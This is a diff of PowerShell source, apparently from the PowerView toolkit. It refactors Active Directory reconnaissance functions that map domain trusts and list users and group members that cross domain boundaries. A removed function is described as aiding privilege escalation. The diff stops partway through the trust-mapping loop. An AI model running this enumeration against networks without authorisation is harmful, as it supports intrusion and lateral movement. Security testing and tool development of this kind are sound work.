<#
- .SYNOPSIS
+.SYNOPSIS
+
+Enumerates users who are in groups outside of the user's domain.
+This is a domain's "outgoing" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser
+
+.DESCRIPTION
+
+Uses Get-DomainUser to enumerate all users for the current (or target) domain,
+then calculates the given user's domain name based on the user's distinguishedName.
+This domain name is compared to the queried domain, and the user object is
+output if they differ.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
- Enumerates users who are in groups outside of their
- principal domain. The -Recurse option will try to map all
- transitive domain trust relationships and enumerate all
- users who are in groups outside of their principal domain.
+.PARAMETER Properties
- .PARAMETER UserName
+Specifies the properties of the output object to retrieve from the server.
- Username to filter results for, wildcards accepted.
+.PARAMETER SearchBase
- .PARAMETER Domain
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- Domain to query for users, defaults to the current domain.
+.PARAMETER Server
- .PARAMETER DomainController
+Specifies an Active Directory server (domain controller) to bind to.
- Domain controller to reflect LDAP queries through.
+.PARAMETER SearchScope
- .PARAMETER LDAP
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- More likely to get around network segmentation, but not as accurate.
+.PARAMETER ResultPageSize
- .PARAMETER Recurse
+Specifies the PageSize to set for the LDAP searcher object.
- Switch. Enumerate all user trust groups from all reachable domains recursively.
+.PARAMETER ServerTimeLimit
- .PARAMETER PageSize
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER SecurityMasks
- .LINK
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- http://blog.harmj0y.net/
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainForeignUser
+
+Return all users in the current domain who are in groups not in the
+current domain.
+
+.EXAMPLE
+
+Get-DomainForeignUser -Domain dev.testlab.local
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
+using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ForeignUser
+
+Custom PSObject with translated user property fields.
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ForeignUser')]
[CmdletBinding()]
- param(
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
[String]
- $UserName,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $Domain,
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $DomainController,
+ $SearchBase,
- [Switch]
- $LDAP,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [Switch]
- $Recurse,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
- )
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- function Get-ForeignUser {
- # helper used to enumerate users who are in groups outside of their principal domain
- param(
- [String]
- $UserName,
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
- [String]
- $Domain,
+ [Switch]
+ $Tombstone,
- [String]
- $DomainController,
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200
- )
+ BEGIN {
+ $SearcherArguments = @{}
+ $SearcherArguments['LDAPFilter'] = '(memberof=*)'
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
+ }
- if ($Domain) {
- # get the domain name into distinguished form
- $DistinguishedDomainName = "DC=" + $Domain -replace '\.',',DC='
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $SearcherArguments['Domain'] = $Domain
+ $TargetDomain = $Domain
+ }
+ elseif ($PSBoundParameters['Credential']) {
+ $TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
+ }
+ elseif ($Env:USERDNSDOMAIN) {
+ $TargetDomain = $Env:USERDNSDOMAIN
}
else {
- $DistinguishedDomainName = [String] ([adsi]'').distinguishedname
- $Domain = $DistinguishedDomainName -replace 'DC=','' -replace ',','.'
+ throw "[Get-DomainForeignUser] No domain found to enumerate!"
}
- Get-NetUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize -Filter '(memberof=*)' | ForEach-Object {
+ Get-DomainUser @SearcherArguments | ForEach-Object {
ForEach ($Membership in $_.memberof) {
- $Index = $Membership.IndexOf("DC=")
- if($Index) {
-
- $GroupDomain = $($Membership.substring($Index)) -replace 'DC=','' -replace ',','.'
-
- if ($GroupDomain.CompareTo($Domain)) {
- # if the group domain doesn't match the user domain, output
- $GroupName = $Membership.split(",")[0].split("=")[1]
+ $Index = $Membership.IndexOf('DC=')
+ if ($Index) {
+
+ $GroupDomain = $($Membership.SubString($Index)) -replace 'DC=','' -replace ',','.'
+
+ if ($GroupDomain -ne $TargetDomain) {
+ # if the group domain doesn't match the user domain, display it
+ $GroupName = $Membership.Split(',')[0].split('=')[1]
$ForeignUser = New-Object PSObject
- $ForeignUser | Add-Member Noteproperty 'UserDomain' $Domain
+ $ForeignUser | Add-Member Noteproperty 'UserDomain' $TargetDomain
$ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname
+ $ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname
$ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain
$ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName
- $ForeignUser | Add-Member Noteproperty 'GroupDN' $Membership
+ $ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership
+ $ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser')
$ForeignUser
}
}
}
}
}
-
- if ($Recurse) {
- # get all rechable domains in the trust mesh and uniquify them
- if($LDAP -or $DomainController) {
- $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
- }
- else {
- $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
- }
-
- ForEach($DomainTrust in $DomainTrusts) {
- # get the trust groups for each domain in the trust mesh
- Write-Verbose "Enumerating trust groups in domain $DomainTrust"
- Get-ForeignUser -Domain $DomainTrust -UserName $UserName -PageSize $PageSize
- }
- }
- else {
- Get-ForeignUser -Domain $Domain -DomainController $DomainController -UserName $UserName -PageSize $PageSize
- }
}
-function Find-ForeignGroup {
+function Get-DomainForeignGroupMember {
<#
- .SYNOPSIS
+.SYNOPSIS
- Enumerates all the members of a given domain's groups
- and finds users that are not in the queried domain.
- The -Recurse flag will perform this enumeration for all
- eachable domain trusts.
+Enumerates groups with users outside of the group's domain and returns
+each foreign member. This is a domain's "incoming" access.
- .PARAMETER GroupName
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainGroup
- Groupname to filter results for, wildcards accepted.
+.DESCRIPTION
- .PARAMETER Domain
+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
+then enumerates the members of each group, and compares the member's domain
+name to the parent group's domain name, outputting the member if the domains differ.
- Domain to query for groups, defaults to the current domain.
+.PARAMETER Domain
- .PARAMETER DomainController
+Specifies the domain to use for the query, defaults to the current domain.
- Domain controller to reflect LDAP queries through.
+.PARAMETER LDAPFilter
- .PARAMETER LDAP
+Specifies an LDAP query string that is used to filter Active Directory objects.
- Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- More likely to get around network segmentation, but not as accurate.
+.PARAMETER Properties
- .PARAMETER Recurse
+Specifies the properties of the output object to retrieve from the server.
- Switch. Enumerate all group trust users from all reachable domains recursively.
+.PARAMETER SearchBase
- .PARAMETER PageSize
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER Server
- .LINK
+Specifies an Active Directory server (domain controller) to bind to.
- http://blog.harmj0y.net/
-#>
+.PARAMETER SearchScope
- [CmdletBinding()]
- param(
- [String]
- $GroupName = '*',
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- [String]
- $Domain,
+.PARAMETER ResultPageSize
- [String]
- $DomainController,
+Specifies the PageSize to set for the LDAP searcher object.
- [Switch]
- $LDAP,
+.PARAMETER ServerTimeLimit
- [Switch]
- $Recurse,
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200
- )
+.PARAMETER SecurityMasks
- function Get-ForeignGroup {
- param(
- [String]
- $GroupName = '*',
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- [String]
- $Domain,
+.PARAMETER Tombstone
- [String]
- $DomainController,
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200
- )
+.PARAMETER Credential
- if(-not $Domain) {
- $Domain = (Get-NetDomain).Name
- }
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- $DomainDN = "DC=$($Domain.Replace('.', ',DC='))"
- Write-Verbose "DomainDN: $DomainDN"
+.EXAMPLE
- # standard group names to ignore
- $ExcludeGroups = @("Users", "Domain Users", "Guests")
+Get-DomainForeignGroupMember
- # get all the groupnames for the given domain
- Get-NetGroup -GroupName $GroupName -Filter '(member=*)' -Domain $Domain -DomainController $DomainController -FullData -PageSize $PageSize | Where-Object {
- # exclude common large groups
- -not ($ExcludeGroups -contains $_.samaccountname) } | ForEach-Object {
-
- $GroupName = $_.samAccountName
+Return all group members in the current domain where the group and member differ.
- $_.member | ForEach-Object {
- # filter for foreign SIDs in the cn field for users in another domain,
- # or if the DN doesn't end with the proper DN for the queried domain
- if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.substring($_.IndexOf("DC="))))) {
+.EXAMPLE
- $UserDomain = $_.subString($_.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'
- $UserName = $_.split(",")[0].split("=")[1]
+Get-DomainForeignGroupMember -Domain dev.testlab.local
- $ForeignGroupUser = New-Object PSObject
- $ForeignGroupUser | Add-Member Noteproperty 'GroupDomain' $Domain
- $ForeignGroupUser | Add-Member Noteproperty 'GroupName' $GroupName
- $ForeignGroupUser | Add-Member Noteproperty 'UserDomain' $UserDomain
- $ForeignGroupUser | Add-Member Noteproperty 'UserName' $UserName
- $ForeignGroupUser | Add-Member Noteproperty 'UserDN' $_
- $ForeignGroupUser
- }
- }
- }
+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
+
+.EXAMPLE
+
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all group members in the dev.testlab.local domain where the member is
+not in dev.testlab.local. binding to the secondary.dev.testlab.local for
+queries, and using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ForeignGroupMember
+
+Custom PSObject with translated group member property fields.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ForeignGroupMember')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('Name')]
+ [ValidateNotNullOrEmpty()]
+ [String]
+ $Domain,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
+ [String]
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
+
+ [Switch]
+ $Tombstone,
+
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
+ )
+
+ BEGIN {
+ $SearcherArguments = @{}
+ $SearcherArguments['LDAPFilter'] = '(member=*)'
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
}
- if ($Recurse) {
- # get all rechable domains in the trust mesh and uniquify them
- if($LDAP -or $DomainController) {
- $DomainTrusts = Invoke-MapDomainTrust -LDAP -DomainController $DomainController -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
+ PROCESS {
+ if ($PSBoundParameters['Domain']) {
+ $SearcherArguments['Domain'] = $Domain
+ $TargetDomain = $Domain
+ }
+ elseif ($PSBoundParameters['Credential']) {
+ $TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
+ }
+ elseif ($Env:USERDNSDOMAIN) {
+ $TargetDomain = $Env:USERDNSDOMAIN
}
else {
- $DomainTrusts = Invoke-MapDomainTrust -PageSize $PageSize | ForEach-Object { $_.SourceDomain } | Sort-Object -Unique
+ throw "[Get-DomainForeignGroupMember] No domain found to enumerate!"
}
- ForEach($DomainTrust in $DomainTrusts) {
- # get the trust groups for each domain in the trust mesh
- Write-Verbose "Enumerating trust groups in domain $DomainTrust"
- Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize
+ # standard group names to ignore
+ $ExcludeGroups = @('Users', 'Domain Users', 'Guests')
+ $DomainDN = "DC=$($TargetDomain.Replace('.', ',DC='))"
+
+ Get-DomainGroup @SearcherArguments | Where-Object {$ExcludeGroups -notcontains $_.samaccountname} | ForEach-Object {
+ $GroupName = $_.samAccountName
+ $GroupDistinguishedName = $_.distinguishedname
+
+ $_.member | ForEach-Object {
+ # filter for foreign SIDs in the cn field for users in another domain,
+ # or if the DN doesn't end with the proper DN for the queried domain
+ if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.SubString($_.IndexOf('DC='))))) {
+
+ $MemberDistinguishedName = $_
+ $MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ $MemberName = $_.Split(',')[0].split('=')[1]
+
+ $ForeignGroupMember = New-Object PSObject
+ $ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain
+ $ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName
+ $ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName
+ $ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
+ $ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName
+ $ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName
+ $ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember')
+ $ForeignGroupMember
+ }
+ }
}
}
- else {
- Get-ForeignGroup -GroupName $GroupName -Domain $Domain -DomainController $DomainController -PageSize $PageSize
- }
}
-function Find-ManagedSecurityGroups {
+function Get-DomainTrustMapping {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function retrieves all security groups in the domain and identifies ones that
- have a manager set. It also determines whether the manager has the ability to add
- or remove members from the group.
+This function enumerates all trusts for the current domain and then enumerates
+all trusts for each domain it finds.
- Author: Stuart Morgan (@ukstufus) <stuart.morgan@mwrinfosecurity.com>
- License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust
- .EXAMPLE
+.DESCRIPTION
- PS C:\> Find-ManagedSecurityGroups | Export-PowerViewCSV -NoTypeInformation group-managers.csv
+This function will enumerate domain trust relationships for the current domain using
+a number of methods, and then enumerates all trusts for each found domain, recursively
+mapping all reachable trust relationships. By default, the .NET method GetAllTrustRelationships()
+is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
+is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
+'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
+Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
- Store a list of all security groups with managers in group-managers.csv
+.PARAMETER API
- .DESCRIPTION
+Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
+.NET methods.
- Authority to manipulate the group membership of AD security groups and distribution groups
- can be delegated to non-administrators by setting the 'managedBy' attribute. This is typically
- used to delegate management authority to distribution groups, but Windows supports security groups
- being managed in the same way.
+.PARAMETER LDAP
- This function searches for AD groups which have a group manager set, and determines whether that
- user can manipulate group membership. This could be a useful method of horizontal privilege
- escalation, especially if the manager can manipulate the membership of a privileged group.
+Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- .LINK
+.PARAMETER LDAPFilter
- https://github.com/PowerShellEmpire/Empire/pull/119
+Specifies an LDAP query string that is used to filter Active Directory objects.
-#>
+.PARAMETER Properties
- # Go through the list of security groups on the domain and identify those who have a manager
- Get-NetGroup -FullData -Filter '(managedBy=*)' | Select-Object -Unique distinguishedName,managedBy,cn | ForEach-Object {
+Specifies the properties of the output object to retrieve from the server.
- # Retrieve the object that the managedBy DN refers to
- $group_manager = Get-ADObject -ADSPath $_.managedBy | Select-Object cn,distinguishedname,name,samaccounttype,samaccountname
+.PARAMETER SearchBase
- # Create a results object to store our findings
- $results_object = New-Object -TypeName PSObject -Property @{
- 'GroupCN' = $_.cn
- 'GroupDN' = $_.distinguishedname
- 'ManagerCN' = $group_manager.cn
- 'ManagerDN' = $group_manager.distinguishedName
- 'ManagerSAN' = $group_manager.samaccountname
- 'ManagerType' = ''
- 'CanManagerWrite' = $FALSE
- }
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- # Determine whether the manager is a user or a group
- if ($group_manager.samaccounttype -eq 0x10000000) {
- $results_object.ManagerType = 'Group'
- } elseif ($group_manager.samaccounttype -eq 0x30000000) {
- $results_object.ManagerType = 'User'
- }
+.PARAMETER Server
- # Find the ACLs that relate to the ability to write to the group
- $xacl = Get-ObjectAcl -ADSPath $_.distinguishedname -Rights WriteMembers
+Specifies an Active Directory server (domain controller) to bind to.
- # Double-check that the manager
- if ($xacl.ObjectType -eq 'bf9679c0-0de6-11d0-a285-00aa003049e2' -and $xacl.AccessControlType -eq 'Allow' -and $xacl.IdentityReference.Value.Contains($group_manager.samaccountname)) {
- $results_object.CanManagerWrite = $TRUE
- }
- $results_object
- }
-}
+.PARAMETER SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
-function Invoke-MapDomainTrust {
-<#
- .SYNOPSIS
+.PARAMETER ResultPageSize
+
+Specifies the PageSize to set for the LDAP searcher object.
+
+.PARAMETER ServerTimeLimit
+
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
+
+.PARAMETER Tombstone
+
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
+
+.PARAMETER Credential
+
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
+
+.EXAMPLE
+
+Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv
- This function gets all trusts for the current domain,
- and tries to get all trusts for each domain it finds.
+Map all reachable domain trusts using .NET methods and output everything to a .csv file.
- .PARAMETER LDAP
+.EXAMPLE
- Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
- More likely to get around network segmentation, but not as accurate.
+Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv
- .PARAMETER DomainController
+Map all reachable domain trusts using Win32 API calls and output everything to a .csv file.
- Domain controller to reflect LDAP queries through.
+.EXAMPLE
- .PARAMETER PageSize
+Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
- The PageSize to set for the LDAP searcher object.
+Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries,
+and output everything to a .csv file.
- .PARAMETER Credential
+.EXAMPLE
- A [Management.Automation.PSCredential] object of alternate credentials
- for connection to the target domain.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
- .EXAMPLE
+Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries
+using the specified alternate credentials, and output everything to a .csv file.
- PS C:\> Invoke-MapDomainTrust | Export-CSV -NoTypeInformation trusts.csv
-
- Map all reachable domain trusts and output everything to a .csv file.
+.OUTPUTS
- .LINK
+PowerView.DomainTrust.NET
- http://blog.harmj0y.net/
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+PowerView.DomainTrust.LDAP
+
+Custom PSObject with translated domain LDAP trust result fields.
+
+PowerView.DomainTrust.API
+
+Custom PSObject with translated domain API trust result fields.
#>
- [CmdletBinding()]
- param(
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.DomainTrust.NET')]
+ [OutputType('PowerView.DomainTrust.LDAP')]
+ [OutputType('PowerView.DomainTrust.API')]
+ [CmdletBinding(DefaultParameterSetName = 'NET')]
+ Param(
+ [Parameter(ParameterSetName = 'API')]
+ [Switch]
+ $API,
+
+ [Parameter(ParameterSetName = 'LDAP')]
[Switch]
$LDAP,
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DomainController,
+ $LDAPFilter,
- [ValidateRange(1,10000)]
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
+ [String]
+ $SearchBase,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [Parameter(ParameterSetName = 'API')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200,
+ $ResultPageSize = 200,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
+
+ [Parameter(ParameterSetName = 'LDAP')]
+ [Switch]
+ $Tombstone,
+ [Parameter(ParameterSetName = 'LDAP')]
[Management.Automation.PSCredential]
- $Credential
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty
)
# keep track of domains seen so we don't hit infinite recursion
@@ -13198,109 +20051,214 @@ function Invoke-MapDomainTrust {
# our domain status tracker
$Domains = New-Object System.Collections.Stack
+ $DomainTrustArguments = @{}
+ if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API }
+ if ($PSBoundParameters['LDAP']) { $DomainTrustArguments['LDAP'] = $LDAP }
+ if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential }
+
# get the current domain and push it onto the stack
- $CurrentDomain = (Get-NetDomain -Credential $Credential).Name
- $Domains.push($CurrentDomain)
+ if ($PSBoundParameters['Credential']) {
+ $CurrentDomain = (Get-Domain -Credential $Credential).Name
+ }
+ else {
+ $CurrentDomain = (Get-Domain).Name
+ }
+ $Domains.Push($CurrentDomain)
while($Domains.Count -ne 0) {
$Domain = $Domains.Pop()
# if we haven't seen this domain before
- if ($Domain -and ($Domain.Trim() -ne "") -and (-not $SeenDomains.ContainsKey($Domain))) {
-
- Write-Verbose "Enumerating trusts for domain '$Domain'"
+ if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {
+
+ Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'"
# mark it as seen in our list
- $Null = $SeenDomains.add($Domain, "")
+ $Null = $SeenDomains.Add($Domain, '')
try {
# get all the trusts for this domain
- if($LDAP -or $DomainController) {
- $Trusts = Get-NetDomainTrust -Domain $Domain -LDAP -DomainController $DomainController -PageSize $PageSize -Credential $Credential
- }
- else {
- $Trusts = Get-NetDomainTrust -Domain $Domain -PageSize $PageSize -Credential $Credential
- }
+ $DomainTrustArguments['Domain'] = $Domain
+ $Trusts = Get-DomainTrust @DomainTrustArguments
- if($Trusts -isnot [System.Array]) {
+ if ($Trusts -isnot [System.Array]) {
$Trusts = @($Trusts)
}
# get any forest trusts, if they exist
- if(-not ($LDAP -or $DomainController) ) {
- $Trusts += Get-NetForestTrust -Forest $Domain -Credential $Credential
+ if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
+ $ForestTrustArguments = @{}
+ if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest }
+ if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential }
+ $Trusts += Get-ForestTrust @ForestTrustArguments
}
if ($Trusts) {
- if($Trusts -isnot [System.Array]) {
+ if ($Trusts -isnot [System.Array]) {
$Trusts = @($Trusts)
}
# enumerate each trust found
ForEach ($Trust in $Trusts) {
- if($Trust.SourceName -and $Trust.TargetName) {
- $SourceDomain = $Trust.SourceName
- $TargetDomain = $Trust.TargetName
- $TrustType = $Trust.TrustType
- $TrustDirection = $Trust.TrustDirection
